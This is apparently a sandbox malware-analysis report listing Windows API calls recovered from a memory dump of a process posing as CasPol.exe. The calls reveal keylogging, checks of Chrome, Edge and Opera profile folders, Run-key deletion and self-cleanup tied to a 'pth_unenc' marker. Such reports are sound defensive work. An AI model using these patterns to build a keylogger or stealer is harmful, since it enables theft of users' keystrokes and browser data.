                            • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                            APIs
                            • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$JD
                            • API String ID: 1901932003-2234456777
                            • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                            • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                            • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                            • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                            • API String ID: 1174141254-4188645398
                            • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                            • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                            • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                            • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                            • API String ID: 1174141254-2800177040
                            • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                            • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                            • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                            • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: AppData$\Opera Software\Opera Stable\
                            • API String ID: 1174141254-1629609700
                            • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                            • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                            • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                            • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040B64B
                              • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                              • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                              • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                              • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                              • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                              • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                              • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                            • String ID: [AltL]$[AltR]
                            • API String ID: 2738857842-2658077756
                            • Opcode ID: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                            • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                            • Opcode Fuzzy Hash: 440f2a55e07645c447245340f9966782ae35bb9e0b4477c7a4060e7ad180e5fa
                            • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                            APIs
                            • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                            • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: uD
                            • API String ID: 0-2547262877
                            • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                            • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                            • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                            • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: !D@$open
                            • API String ID: 587946157-1586967515
                            • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                            • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                            • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                            • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040B6A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                            • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                            • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                            • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                            APIs
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • __Init_thread_footer.LIBCMT ref: 00410F29
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: ,kG$0kG
                            • API String ID: 1881088180-2015055088
                            • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                            • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                            • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                            • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                            • API String ID: 2654517830-1051519024
                            • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                            • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                            • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                            APIs
                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteDirectoryFileRemove
                            • String ID: pth_unenc
                            • API String ID: 3325800564-4028850238
                            • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                            • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                            • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                            • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                            APIs
                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                            • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ObjectProcessSingleTerminateWait
                            • String ID: pth_unenc
                            • API String ID: 1872346434-4028850238
                            • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                            • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                            • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                            • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                            • GetLastError.KERNEL32 ref: 00440D35
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                            • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                            • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                            • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                            APIs
                            • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                            • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                            • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                            • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastRead
                            • String ID:
                            • API String ID: 4100373531-0
                            • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                            • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                            • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                            • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99